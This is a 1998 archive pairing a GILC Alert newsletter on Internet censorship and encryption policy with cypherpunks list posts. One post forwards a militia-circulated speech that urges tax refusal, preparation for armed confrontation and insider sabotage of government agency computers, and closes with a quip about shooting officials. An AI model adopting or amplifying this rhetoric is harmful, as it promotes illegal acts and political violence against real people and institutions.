If you are a part of an organization that would be interested in
joining GILC, please contact us at gilc@gilc.org. If you are aware of
threats to cyber liberties that we may not know about, please contact
the GILC members in your country, or contact GILC as a whole.
Please feel free to redistribute this newsletter to appropriate
forums.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [A] FOREMOST NEWS
[A1] GILC to Issue Statement on Internet Content and Conduct
[B] ROUNDUP OF GLOBAL INTERNET ISSUES
[B1] Africa
[B1.1] Sudan's Muslim Sects Want Internet Ban
[B1.2] Ghana Brings Internet to People
[B2] Asia/Oceania
[B2.1] Singapore Requires ISPs to Install Internet Filters
[B2.2] Malaysia Warns Against Technology Without Morality
[B2.3] Hong Kong Labels Candy Site "Objectionable"
[B2.4] Australia Concerned Over US Domain Name Proposals
[B3] Europe
[B3.1] EU Critiques US Over Domain Name "Green Paper"
[B3.2] Russia Considers Amendment to Protect Internet From New "Mass
Media" Law
[B3.3] Kosovo Atrocities Posted to Internet
[B3.4] UK Called on EU Members to Allow Police to "Tap" Encrypted
Messages
[B4] North America
[B4.1] Senate Approves Two Internet Bills
[B4.2] FBI Chief Freeh Warns Against "Uncrackable Encryption"
[B4.3] FBI Rethinks Encryption Position, For Now
[B4.4] New Mexico Censors Internet
[B4.5] 100 Companies Join to Fight Encryption Controls



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CELEBRATE THE 50TH ANNIVERSARY OF THE SIGNING OF THE UNIVERSAL
DECLARATION OF HUMAN RIGHTS BY GOING TO THE AMNESTY INTERNATIONAL
HUMAN RIGHTS CARAVAN SITE AND JOINING THE THOUSANDS WHO'VE SIGNED THE
DOCUMENT.

THE CYBER"BOOK" OF SIGNATURES WILL BE CARRIED AROUND THE WORLD AND
SIGNED BY DIGNATARIES, CELEBRITIES, POLITICIANS AND OTHERS.

REAFFIRM THE WORLD'S DEDICATION TO HUMAN RIGHTS AND CIVIL LIBERTIES!!!

http://www.rights.amnesty.org/english/signup/index.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 [A] FOREMOST NEWS
[A1] GILC to Issue Statement on Internet Content and Conduct

Preparing for an OECD one day meeting on "International Co-operation
Concerning Content and Conduct on the Internet", 25th March 1998, in
Paris, members of the Global Internet Liberty Campaign will soon issue
"Content and Conduct on the Internet: The Impact of Self-Regulation
and Filtering on Human Rights to Freedom of Expression."  Among other
things, the statement notes: "Global rating or labeling systems
squelch the free flow of information: Efforts to force all Internet
speech to be labeled or rated according to a single classification
system distorts the fundamental cultural diversity of the Internet and
will lead to domination of one set of political or moral viewpoints.
Such systems will either be easy to use and not have enough categories
for all cultures or it will have so many categories to cater for all
cultures that it will be unusable. These systems are antithetical to
the Internet and should be rejected."

A full report on the OECD meeting and GILC's presentation will appear
in the next Alert.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B] ROUNDUP OF GLOBAL INTERNET ISSUES
[B1] Africa
[B1.1] Sudan's Muslim Sects Want Internet Ban

Islamic clerics, in recent calls, have focused their ire on Sudan's
single Internet Service Provider, Sudanet.  Inter Press Service quotes
Mohamed Salih Hassan, a cleric of the influential Ansar Muslim sect,
who sees the Internet as "pollutive" and fears that Sudanese youth are
in jeopardy: "The Muslim people should respect the faith, and not
allow such information to reach their families.  If an uncontrollable
system like the Internet is introduced in society it will be very
difficult for us to preach the Kingdom of Allah."  The battle to ban
the Internet will be difficult, however.  The newspaper interviewed
people already connected to the Internet; one, who used an alias
because he feared repercussions, said: "The Internet is not against
anybody. It is a new information system that feeds the world with
information . . . . The Internet will bring peace to all of us.  It
makes me feel like I am living in a world without borders."
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B1.2] Ghana Brings Internet to People

While most people in Ghana do not have access to their own computers
(because of the combined problems of illiteracy, poverty and weak
electrical supplies), they will soon have access to the Internet.
Several Internet Service Providers are looking for ways to bring the
Internet to the average Ghanaian, through channels that people are
already familiar with: communication centers that offer secretarial,
word-processing, telephone and fax services.  Inter Press Service
reports "Africa Online will create a domain for each of the
participating communications centers. The center, in turn, will be
free to create E-mail addresses for its customers, who can then send
and receive messages from their address at fixed costs."  ISPs are
also looking to provide access to school children.  Network Computer
Systems, another ISP, has recently offered to provide free Internet
connections for a year to 100 high schools around the country.

Visit the Network Computer Systems homepage: http://www.ghana.com

Visit Africa Online: http://www.africaonline.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++

[B2] Asia/Oceania
[B2.1] Singapore Requires ISPs to Install Internet Filters

Singapore, which already censors the Internet, books and movies will
require its Internet Service Providers to install, at the server
level, software that filters "inappropriate material."  Reuters quoted
Information and Arts Minister George Yeo's address to parliament where
he said that a software package, like Netnanny was "in the interest of
cleaner, more sanitized internet service."  A few days after that
speech, Bill Gates said, during a one-day trip to the country: "I have
no doubt Singapore, given it is a forward-looking country . . . will
avoid doing something that will be a major roadblock."

Read http://biz.yahoo.com/finance/980319/singapore__1.html

Read
http://www.wired.com/news/news/email/other/politics/story/10944.html

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B2.2] Malaysia Warns Against Technology Without Morality

With Internet cafes springing up in suburbs all over Malaysia,
students are beginning to send E-mail, chat in chat rooms, and
eventually view sexually explicit material.  To officials in the
predominantly Moslem country, this presents problems.  The nation's
censors already take pains to keep movies free from "sex scenes" and
magazines bare-breastless. The Associated Press quotes Junid Megat
Ayob, Consumer Affairs Minister, who wants stricter controls on the
Internet because he sees his mission as keeping youth from "poisoning
their minds with filth."  To aid in his mission, Cybercafes must now
post with authorities about US$5,100 to ensure that their computers
remain free from pornography.  If the Cafes allow access to sexually
explicit material, the government would confiscate the money.

Read http://www.wired.com/news/news/politics/story/10712.html

Read
http://search.washingtonpost.com/wp-srv/WAPO/19980314/V000800-031498-i
dx.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B2.3] Hong Kong Labels Candy Site "Objectionable"

In another attempt to block "objectionable material" from the
Internet, Hong Kong has censored a Hershey's candy Web site. The
Television and Licensing Authority (TLA) put the "Smarties" candy site
on a list of 1,000 sites which it deemed unfit for children.  CNET
quoted Raymond Yip, of TLA: "We need to investigate the case.  It is
probably a typing error on our part."

Read http://www.news.com/news/item/textonly/0,25,20039,00.html?pfv

The "unfit" Web site is: http://www.smarties.com

Read EPIC's "Faulty Filters" report:
http://www2.epic.org/reports/filter-report.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B2.4] Australia Concerned Over US Domain Name Proposals

The United States has recently proposed a centralized plan to regulate
Internet issues.  Besides changing the way persons register Internet
Domain Names, a US-based corporation would administer the names and
subject any disputes to US law. Fears are that the plan would
"effectively ensure US jurisdiction over trademark issues and dispute
resolution processes," said Senator Richard Alson, the Minister for
Communications, the Information Economy and the Arts, in a press
release. He added: "We need to ensure that the views of Australian
stake holders, and the Australian Government, are fully considered in
decisions to reform the international system."

Read the Press Release: http://www.dca.gov.au/mediarel/98/028.html

Go to Electronic Frontiers Australia for more news on related issues:
http://www.efa.org.au

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[B3] Europe
[B3.1] EU Critiques US Over Domain Name "Green Paper"

The battle against the US Domain Name proposals is also being waged on
European soil.   The European Commission has accused the US of
desiring to keep the international network of computers under domestic
control, and thereby, creating a monopoly.  The European Report
announced that "the EU and its Member States are calling for a
re-balancing of interest and responsibilities in recognition of the
Internet's international character."  They want balanced and fair
participation by the private sector in Internet management. In a
"green paper" published in January, the US suggested that the private
sector begin controlling essential pieces of the system, instead of
the US government.  The "essential pieces" are "generic top-level
domains": for example, ".net," ".org," and ".com."  The Deutsche
Presse-Agentur quotes Professor of Computer Science, Werner Zorn of
the University of Karlsruhe in Germany: "The U.S. government is trying
to prevent foreign dominance on the Internet." Another motive, adds
Zorn, is retaining a lucrative source of income.  Today, US-based
Network Solutions charges $100 per domain name registered.

Read the International Council of Registrars' response to the US
"Green Paper": http://biz.yahoo.com/bw/980323/core_1.html

Read the CATO Institute's "INTERNET DOMAIN NAMES:
Privatization, Competition, and Freedom of Expression":
http://www.cato.org/pubs/briefs/bp-033es.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B3.2] Russia Considers Amendment to Protect Internet From New "Mass
Media" Law

The Moscow Times reported that the Russian Duma has recently proposed
a new law on "mass media that could place a roadblock in the path of
Russia's fledgling web publishers, from individuals with personal home
pages to large corporations blazing the trails of electronic
commerce."  Duma deputy, Y.M. Nesterov, however, suggested an
amendment excluding any mention of "computer information" from the
bill.  Furthermore, the chair of the committee preparing the bill,
displayed some interest in the Internet question.  The Communication
Committee will examine that and other amendments to the "mass media"
bill and draft a second bill for final hearing.  As of yet, nothing
has been announced.

Latest information in Russian:
http://www.cityline.ru/politika/media/media.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B3.3] Kosovo Atrocities Posted to Internet

In the remote parts of Yugoslavia, unreliable links to the outside
world and the tight-lipped state news agency, Tanjug, have made a
journalist's job difficult. But in many situations, the Internet
continues to provide detailed and timely reports.  The Scotsman
reports that Web sites publish, without the "benefit" of censorship,
and post eyewitness accounts and pictures of "men, women, and children
with eyes gouged out, throats cut, and grenade and gunshot wounds."
The Internet accounts guarantee that traditional sources of
information will not dictate the spread of complete and accurate
information; therefore, "there can be no doubt whatsoever of the
veracity of claims made by Albanians in Kosovo."

Visit: http://www.kosova.com

Visit: http://www.albanian.com

Read the GILC Statement on Human Rights and the Internet:
http://www.gilc.org/news/gilc-ep-statement-0198.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B3.4] UK Called on EU Members to Allow Police to "Tap" Encrypted
Messages

Following the GILC statement on encryption, European Voice reported
that officials from the UK desire that, in particular situations,
government officials should be authorized to tap encrypted E-mail
messages sent through the Internet.  Citing concerns with terrorists,
the Mafia, and other criminal organizations, UK officials warned:
"Where an encryption key is used for confidentiality purposes, it may
be necessary for law enforcement agencies to have lawful access . . .
.. either overt[ly] or covert[ly]."  For an opposing view, European
Voice quoted the Business Software Alliance: "Without strong
encryption, businesses and individuals will not entrust their valuable
proprietary information, creative content, and sensitive information
to electronic networks. The result will be that the full potential for
electronic commerce, personal growth and government efficiency and
other benefits of the information society will be delayed or lost
altogether." According to Yaman Akdeniz of Cyber-Rights &
Cyber-Liberties (UK) the current UK policy is still not clear: "We
will have to wait and see the new policy; and I, unfortunately,
believe that it will still be a system which favors key escrow."

Read the GILC Statement on possible UK Cryptography Policy:
http://www.gilc.org/crypto/uk/gilc-dti-statement-298.html

Read BBC News Coverage of the GILC member statement, "UK government
dithers on encryption regulation," Feb.20, 1998.
http://news.bbc.co.uk/hi/english/special_report/1998/encryption/newsid
_58000/58499.stm

Read GILC's Cryptography and Liberty: An International Survey of
Encryption Policy, February 1998, at
http://www.gilc.org/crypto/crypto-survey.html.

Read Cyber-Rights & Cyber-Liberties (UK), "First Report on UK
Encryption Policy" is available at
http://www.leeds.ac.uk/law/pgs/yaman/ukdtirep.htm.

Read "Scrambling for Safety" Conference Web site is at
http://www.privacy.org/pi/conference/dti/.

Read the Walsh Report, "Review of policy relating to encryption
technologies": http://www.efa.org.au/Issues/Crypto/Walsh/

Read Kryptographie, Cryptography resources in German from FITUG, at
http://www.fitug.de/ulf/krypto/.

Britain has delayed any encryption proposals:
http://www.techweb.com/wire/story/TWB19980219S0008

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[B4] North America
[B4.1] Senate Approves Two Internet Bills

The Senate Commerce Committee approved on a voice vote two bills that
restrict speech on the Internet.  The first was Senator John McCain's
(which would limit student access to constitutionally protected speech
in schools and libraries) and the other was Senator Dan Coats's (which
would censor legitimate adult speech).  McCain's bill requires schools
and libraries, which receive federal subsidies for Internet
connections, to install filtering software.  Senator Conrad Burns,
however, offered an amendment that would not require the use of
filtering software, but would require that schools have some kind of
Internet policy which shields students from sexually explicit
material.  Senator Coats's bill would censor commercial distribution
of "harmful material" to people under 17 years of age.  Senator Dan
Wyden, the sole dissenter on the Coats bill, criticized Coats's
attempt as a "one size fits all" model.

Read the ACLU Press Release: http://www.aclu.org/news/n031298b.html

Go to the Internet Free Expression Alliance for more news on the
bills: http://www.ifea.net

Go to the EPIC site for the text of the bills: http://www.epic.org

Read EFF's Press Release:
http://www.eff.org/pub/Censorship/Internet_censorship_bills/1998_bills
/19980312_eff.statement

Go to CDT's site for more information: http://www.cdt.org/speech
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B4.2] FBI Chief Freeh Warns Against "Uncrackable Encryption"

Before a Senate Appropriations Committee Subcommittee on Commerce,
Justice, State and Judiciary on March 3rd, Louis Freeh, director of
the FBI, argued that online anonymity imperiled FBI criminal
investigations and put children in danger: "We would encourage the
Internet provider industry to maintain subscriber and call
information.  We certainly hope it would be done, even on a voluntary
basis." Freeh added: "Uncrackable encryption allows, and will continue
to allow with increasing regularity, drug lords, terrorists, and even
violent gangs to communicate about their criminal intentions with
impunity."

The ACLU challenged these scare tactics with "Big Brother in the
Wires": http://www.aclu.org/issues/cyber/wiretap_brother.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B4.3] FBI Rethinks Encryption Position, For Now

The FBI has had a long history of arguing against strong encryption.
Nevertheless, on March 17th, a Justice Department official, Robert
Litt, the deputy assistant attorney general of the criminal division,
remarked to a Senate Judiciary subcommittee hearing on the
constitutional issues raised by government encryption controls: "We
are not looking for any mandatory controls domestically at this time."
The CyberTimes reported that, for now, he/the FBI/the Clinton
administration is "retreating from legislation that would give 'law
enforcers access to encrypted computer data and communications.'"

CyberTimes:
http://www.nytimes.com/library/tech/98/03/cyber/articles/18encrypt.htm
l

CNET's article: http://www.news.com/news/item/0,4,20149,00.html

For a full transcript of the congressional testimony:
http://www.computerprivacy.org/archive/03171998-1

Legal scholars respond to Litt:
http://www.computerprivacy.org/archive/03231998-1.shtml

ACLU's "White Paper" on Clinton's encryption policy:
http://www.aclu.org/news/n031798b.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B4.4] New Mexico Censors Internet

The Electronic Frontier Foundation will challenge New Mexico's "Net
Indecency Law."  Earlier this month, Governor Gary Johnson signed a
bill that suffers from the same constitutional defects that caused the
Supreme Court to strike down the Federal Communications Decency Act in
June of 1997.  In a letter to Johnson, Barry Steinhardt, president of
EFF (a GILC founding member) wrote, "the bill is patently
unconstitutional and represents a threat to freedom of expression, not
only in New Mexico, but across the country."
EFF's letter:
http://www.eff.org/pub/State_and_local/NM/Censorship/Internet_censorsh
ip_bills/1998/19980307_eff_sb127.letter

CNET article:
http://www.news.com/news/item/textonly/0,25,19859,00.html?pfv

Reno v. ACLU: http://www.aclu.org/court/renovacludec.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[B4.5] 100 Companies Join to Fight Encryption Controls

Americans for Computer Privacy (ACP) has begun an advertisement
campaign urging citizens to stop their politicians from limiting
encryption.  In a press release, ACP stated that it "will implement a
multi-million dollar campaign to demonstrate to members of Congress
and administration officials that a fair encryption policy is not just
a computer issue.  It's a privacy issue.  It's a consumer issue. It's
a medical records issue.  It's a taxpayer protection issue.  It's a
crime deterrent issue.  It's a jobs issue.  It's a competitive issue.
In an open letter, the American Civil Liberties Union, the Electronic
Frontier Foundation and the Electronic Privacy Information Center
said, "(W)e believe that the ACP will be an important ally in the
ongoing effort to protect personal privacy in the digital age," the
letter says, "and we look forward to working together towards a
complete and unrestricted repeal of the current controls on the export
of strong cryptography and to resist any domestic restrictions on the
use of encryption."
The Washington Post article:
http://www.washingtonpost.com/wp-srv/Wplate/1998-03/04/0491-030498-idx
..html

ACP can be found at http://www.computerprivacy.org

The American Civil Liberties Union, The Electronic Frontier
Foundation, and the Electronic Privacy and Information Center issued
this joint letter: http://www.aclu.org/news/n030498a.html
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++
Raafat S. Toss
GILC Organizer Developer
American Civil Liberties Union
125 Broad Street
New York, New York 10004
rtoss@aclu.org
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++
Links to all information in this alert can be found at
http://www.gilc.org

You are welcome to pass the GILC ALERT to all who may be interested.
And you have permission to re-print GILC ALERT and distribute it.

If you are not a subscriber but would like to be, please send an email
to gilc-announce@gilc.org with the following message in the body:

  Subscribe gilc-announce <your email address>

PUBLICATION OF THIS NEWSLETTER IS MADE POSSIBLE BY A GRANT FROM THE
OPEN SOCIETY INSTITUTE (OSI)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net
Date: Sun, 29 Mar 1998 10:22:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fw: Re: Calif. AB2560=A Whiff Of Dictatorship....
In-Reply-To: <b9d6b2c2c8e506da@aen.org>
Message-ID: <199803291822.KAA04950@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> > In addition to the AB 23 bill, which will retroactively felonize a very
> > broad class of weapons, here's a new one which will make felons out of
> > anyone who goes shooting with others, anyone who teaches a self-defense
> > class, and (depending on interpretation by the courts) anyone who gives
> > advice here on the Cypherpunks list about weapons, self-defense, and
> > explosives and suchlike devices.

Let me know when it passes, you note I said *when* and I'll offer advise 
direct to californicates attorney general via this list. Seeing as states are 
attempting to persecute non-state-citizens with it's laws it should be 
interesting.

and .45acp beats 9mm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net
Date: Sun, 29 Mar 1998 10:27:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: (Fwd) Slaves
Message-ID: <199803291827.KAA05001@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May said

>  It's time to take direct action against the bozos who keep restricting our
> freedoms. I used to be more moderate, favoring more civil measures to rein
> them in. This isn't working. They're pressing in at every level.  They are
> declaring war. 


------- Forwarded Message Follows -------
From:          jcaldwel@iquest.net
Organization:  People in Green
To:            jcaldwel@iquest.net
Date:          Sun, 29 Mar 1998 13:26:57 +0000
Subject:       Slaves
Priority:      normal

--Digest-12348D34

Return-Path: <aen!aen.org!bill.smith@uunet.uu.net>
Delivered-To: jcaldwel@iquest.net
Received: (qmail 26126 invoked from network); 26 Mar 1998 19:21:46 -0000
Received: from relay2.uu.net (192.48.96.7)
  by iquest3.iquest.net with SMTP; 26 Mar 1998 19:21:46 -0000
Received: from uucp1.uu.net by relay2.UU.NET with SMTP 
 (peer crosschecked as: uucp1.uu.net [192.48.96.81])
 id QQeikj15143; Thu, 26 Mar 1998 14:21:39 -0500 (EST)
Received: from aen.UUCP by uucp1.uu.net with UUCP/RMAIL
        ; Thu, 26 Mar 1998 14:21:40 -0500
Received:  by aen.org (MailGate 0.24 mg@ear.anpe.br)
           Thu, 26 Mar 1998 14:16:08
Date:      Mon, 23 Mar 1998 11:55:03
From: BILL SMITH <bill.smith@aen.org>
Sender: AEN-NEWS <NEWS@AEN.ORG>
Message-ID: <09d2e3ec8534c45b@aen.org>
Organization: American Justice Federation
To: Multiple recipients of list NEWS <NEWS@AEN.ORG>
Subject:   slaves                2/3
X-Mailer: MailGate 0.24 Unregistered
X-UIDL: dd9d59da658bbfbae62111c9cb7e5e4e

* Original: FROM: BILL SMITH
* Original: TO:   ALL
* Original: AREA: MILITIA

* Forwarded by Al Thompson
* Forwarded Using QuickBBS 2.76 Ovr
* Forwarded at 13:17 on 26-Mar-98 

 EID:F933 FC775EE0
>>> Continued from previous message
Rescinding your social security number is another thing that I would have
said a year ago, "OK, it's an option, but it's a grandstanding option.
It's waving and saying, 'Hey, hey, I'm a troublemaker. Put me on a list.'" But
I am going to be rescinding my social security number formally, writing to the
Social Security Administration and saying, "Nope. Not my number, folks." It may
be a grandstanding gesture, but that number is a slave's number, and I'm
getting rid of it, pure and simple.

Now a lot of people -- a lot of people _here_ -- are doing these things
already. I know people right here in this group who haven't paid taxes in
years. I know people in this group who don't have a driver's license, who
_have_ rescinded their social security numbers, or whatever, and I think
that's great.

In fact Rick White came up with a really good term the other day when we
were talking. He talked about "individual secession" as a means of
combating the government. We were talking about ways of avoiding violence, and
he suggested "individual secession" as a means of accomplishing that. I think
it's great, and I think we all need to do it.

But I also think that the result of quiet secession -- of just quietly
withdrawing your consent, your support, your participation in the system
-- the result of that is something like what happened in the Soviet Union.
Eventually the system collapses, but what's left? You have black markets. We
like black markets, because they're free markets. But they are corrupt markets
that are run by gangsters, eventually. We need free, open markets. We need to
declare freedom and live it publicly, instead of by hiding.

I think individual secession is good, but we need to make noise doing it.
And not polite noise. We libertarians are very polite people, very
well-mannered. We sign our little pledge, and we do the right thing,
because that's the kind of people we are. But we need to make noise. We
need to say, "I'm withdrawing. I'm withdrawing, and here's why, and come
get me."

And that goes against everything I personally believe. One reason you
never heard of Claire Wolfe until six months ago was that although I've
been an activist, I have tried to keep a low profile and tried to be
really quiet, because I didn't want the IRS knocking on my door, or
kicking it down as the case may be. I didn't want the ATF coming in to say
hello at four in the morning. But I don't care any more. I _do_not_ care any
more, and I think we're coming to a confrontation point anyway, and if that's
what happens, so be it.

I think there are a lot of other things that you can all do and probably
all _are_ doing; probably a lot of you are ahead of me. That's why I like
coming down to Arizona; I learn from what people in Arizona are doing. But
certainly, withdraw to the extent that you can from the banking system.

Set your political priorities -- don't waste your time on things that
aren't working. Like for me, I was always always sitting down writing
stupid letters to my congressperson, as if my congressperson cared. I felt like
I was doing something. But one of the things I've learned since those days is
to do is prioritize. And that means don't even bother any more. Don't even talk
to them any more.

I think everybody should be studying warfare, in one way or another.
Whether that's the personal warfare of going up to Gunsite and learning
how to shoot in combat situations or whether that's studying _The Art of
War_, reading books by Mao, or Che Guevara, or Sun-Tzu. I think we all
need to be doing that, even if we don't want the confrontation. None of us
_want_ the confrontation, but I think we'd better be prepared for it in those
ways.

I think we should all be getting out of government jobs -- with one
exception. With one exception, and this is something I've just been
thinking about. I've decided that over the last thirty years some
_wonderful_ libertarian has been running the IRS' computer system. And I
say, "Thank you out there, whoever you are, and keep it up! Good job!" So
anybody who's in a position to do unto the ATF or unto the EPA what has
been done to the IRS, definitely go for it.

One of the things that we can do, whether we're looking for confrontation
or not, is to establish some virtual communities. And here's where Michael Voth
comes in. Michael of the Coconino libertarians, and Kevin Burt of the Laramie
County libertarians of Cheyenne Wyoming, cooked up this notion of "cousin
counties".

You know how we have "sister cities" all around the world? Well, we now
have a "cousin countyship" between Laramie and Coconino libertarians. We
don't exactly know what we're going to do with it yet, but we have our own
"virtual community", and it is somewhat of an act of...well I don't think we
care enough to _defy_ the national hierarchy, but we're going to make
connections despite the hierarchy.

Some day we may need a "safe house" in Coconino; some day they may need a
"safe house" in Laramie County. Some day we may need to be stations on an
underground railroad for getting patriots to safety. We may need to be
stations on a supply line, and we have that connection established. We
have a relationship with each other already, and we'll do what seems
appropriate with it.

That, unfortunately, brings us to the national party, or
higher-up-the-line parties. I think -- and this is just a personal
viewpoint -- that the best thing that the state party could be, or the
best thing that the national party could be for individual libertarians is a
support group to help us establish networks with each other; to help us keep
connections with each other; to help us learn from each other; what works and
what doesn't work; what did they try over in Alabama that might work in Nevada,
or that was a disaster and might not work anywhere?

Your state organization is great for that, I think, to the extent that I
know it. Unfortunately you're one of the few that is. And unfortunately,
of course, we have National. The national party. The commissariat of
Washington, D.C.

What is the national party? It is a top-down fund-raising organization
that is into telling us what we should do, not learning from us and
helping to spread it around.

And certainly some of the things that we should _not_ do, according to
National...we should not have people like L. Neil Smith at our gatherings. He
has been declared "unfit" by the national party. And I hope you all recognize
that. [Applause for Smith, who was sitting in the audience.]

Also, a year or so ago, those of us who got the "Libertarian Volunteer"
got an issue that listed the "twelve most terrible things" that have ever
been done at local party meetings. One of them was to discuss "Should
There Be A Libertarian Party?" I mean, that's shocking. How _dare_ we talk
about such a thing?

So here we are at a time when we need individualism, autonomy, quick
action and networking, being saddled with this sort of dinosaur with the
little pea-brain up here in Washington, DC, trying to communicate down to
us, thinking we're its tail or something. Yhey are so busy trying to be
like the other folks in Washington, D.C. that they are very quickly
forgetting that they _are_ libertarians.

But I'm sure they're quite good at fund-raising; I've hear wonderful tales
about their fund-raising. In fact, something quite interesting that I heard the
other day indirectly from Neil: Harry Browne is criticizing _me_ as one of the
people who was damning him for his fund-raising and odd campaign spending
practices. Well, I never did. I would have. I would have been happy to, because
of what I have heard from Vin Suprynowicz and Neil Smith and other people. But
it didn't happen.

So, National is giving us enemies lists and fund-raising corruption, among
other pleasures of politics. Heck, they're headquartered in the Watergate,
after all! What are we going to do with these people? They think that success
is raising a lot of money whether it goes to any good cause or not. They think
that success is being invited to the cocktail parties with the Democrats and
the Republicans. They think that success is having libertarianism favorably
mentioned in the Washington Post.
>>> Continued to next message
---
 * OLX 2.2 * It's dangerrous to be right when the government is wrong
--- GEcho 1.00
 # Origin: Texas Patriot PRN-Dallas (972)495-6699 (176:200/200)
 GPTH: 200/200 0 100/0 500/0 14
 GATE: 1:273/304.0@fidonet 35188aac

* Origin: FidoNet <-> PRNet EchoGate! (1:273/304.0)
*********************************************************
To post a message to AEN NEWS, address it to news@aen.org.


--Digest-12348D34

Return-Path: <aen!aen.org!bill.smith@uunet.uu.net>
Delivered-To: jcaldwel@iquest.net
Received: (qmail 26399 invoked from network); 26 Mar 1998 19:22:23 -0000
Received: from relay5.uu.net (192.48.96.15)
  by iquest3.iquest.net with SMTP; 26 Mar 1998 19:22:23 -0000
Received: from uucp1.uu.net by relay5.UU.NET with SMTP 
 (peer crosschecked as: uucp1.uu.net [192.48.96.81])
 id QQeikj07942; Thu, 26 Mar 1998 14:21:59 -0500 (EST)
Received: from aen.UUCP by uucp1.uu.net with UUCP/RMAIL
        ; Thu, 26 Mar 1998 14:22:00 -0500
Received:  by aen.org (MailGate 0.24 mg@ear.anpe.br)
           Thu, 26 Mar 1998 14:16:15
Date:      Mon, 23 Mar 1998 11:55:04
From: BILL SMITH <bill.smith@aen.org>
Sender: AEN-NEWS <NEWS@AEN.ORG>
Message-ID: <57aba693e31d8602@aen.org>
Organization: American Justice Federation
To: Multiple recipients of list NEWS <NEWS@AEN.ORG>
Subject:   slaves                3/3
X-Mailer: MailGate 0.24 Unregistered
X-UIDL: 212fd7b6a01af2f18063501274f82fcf

* Original: FROM: BILL SMITH
* Original: TO:   ALL
* Original: AREA: MILITIA

* Forwarded by Al Thompson
* Forwarded Using QuickBBS 2.76 Ovr
* Forwarded at 13:17 on 26-Mar-98 

 EID:E912 FC775EE0
>>> Continued from previous message
OK, if I were favorably mentioned in the Washington Post, I would do
everything I could to change my ways! Wouldn't you? Who wants to be
favorably mentioned by people who think that every bit of dissent is
_hate_speech_? Who think that anyone who is not a Republican or a Democrat or
in the mainstream is some sort of crazy? No. No thank you. Hunh-unh. No thanks.

We try very hard to be acceptable. The national party is trying to be
acceptable and there's nothing wrong with that. It's human. I mean we want to
be accepted from the moment we're born. But the question is, to whom do we want
to be acceptable?

I don't want to be acceptable to the same people that the national party
wants to be acceptable to. I want to be acceptable to you guys. And I want you
to be acceptable to me, because we are going to need each other some day. I
want to be with you when we prepare.

I don't care whether you're preparing even for the same eventuality that
I'm preparing for. I don't care if you're a pacifist. There is room for
many differences. But we've got a role to play, and it's we, not national, who
are going to play that role.

Something is going to happen. I wish I could tell you what it was. I've
been talking to people and everybody's going through the same thing --
"Well, I think it might be this", "I think it might be that", "I think it
might be the other" -- we don't know. But it's coming. Whether it breaks
with the suddenness of an earthquake, or whether it comes like a storm
that you can see rolling toward you for hours, it _is_ coming.

And the big question for all of us, when this hits, is, "Do I want to be
polite and acceptable or _do_I_want_to_be_FREE?"

Free, of course! I mean, it's easy, right? It's easy! So let's do it! I
have absolute confidence you guys are going to be _able_ to do it. And
when it all comes down, I want to be here, if not physically in Arizona, I want
to be in your virtual community.

So thank you for your guts. And thank you for having me here. And thank
you for being brave enough to talk about things that National doesn't want you
to talk about, and to do things that National doesn't want you to do. My
congratulations and gratitude to all of you.

*****

NOTE on the health care database: I have since been fiercely corrected on
this point. I may have been overstating the present danger of such a
database, though I believe the danger remains grave for the near future.
The health care bill (available from the Library of Congress' Thomas web
site as HR 3101 or Public Law 104-191) establishes a federal database for
reporting medical fraud and abuse. I don't believe this is the problem,
however it was part of the confusion. Later, in Sections 1171-1175, the
bill outlines a plan for the Secretary of Health and Human Services to set
standards for the electronic transmission of all health care data. These
"standards" do not constitute a database, and I thank the critic who corrected
me on that issue. However, the secretary is directed to set one standard _by
which all medical data will be electronically communicated_. The standard must
include a "unique identifier" for every individual whose medical information is
ever transmitted (Sec. 1173). In doing that, Congress is clearly allowing the
Clinton administration to create a de facto single, nationwide system to which
federal (and other) bureaucrats will have easy access, almost certainly via our
social security numbers. If this does not rapidly become the feared federal
database, it will nevertheless allow the government, researchers and others to
run rampant through the various private or state databases that will use the
federally defined standard. I regret any confusion. But I urge you to keep your
eyes open and your heads up...not that it will do you much good when
bureaucrats are secretly slurping your medical data -- law or no law -- into
their computers.

(c)Claire Wolfe 1997


+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+

America is at that awkward stage. It's too late to work
within the system, but too early to shoot the bastards.

-- Claire Wolfe, "101 Things To Do 1Til the Revolution"

http://www.geocities.com/CapitolHill/Lobby/1797/essay.htm

---
 * OLX 2.2 * It's dangerrous to be right when the government is wrong
--- GEcho 1.00
 # Origin: Texas Patriot PRN-Dallas (972)495-6699 (176:200/200)
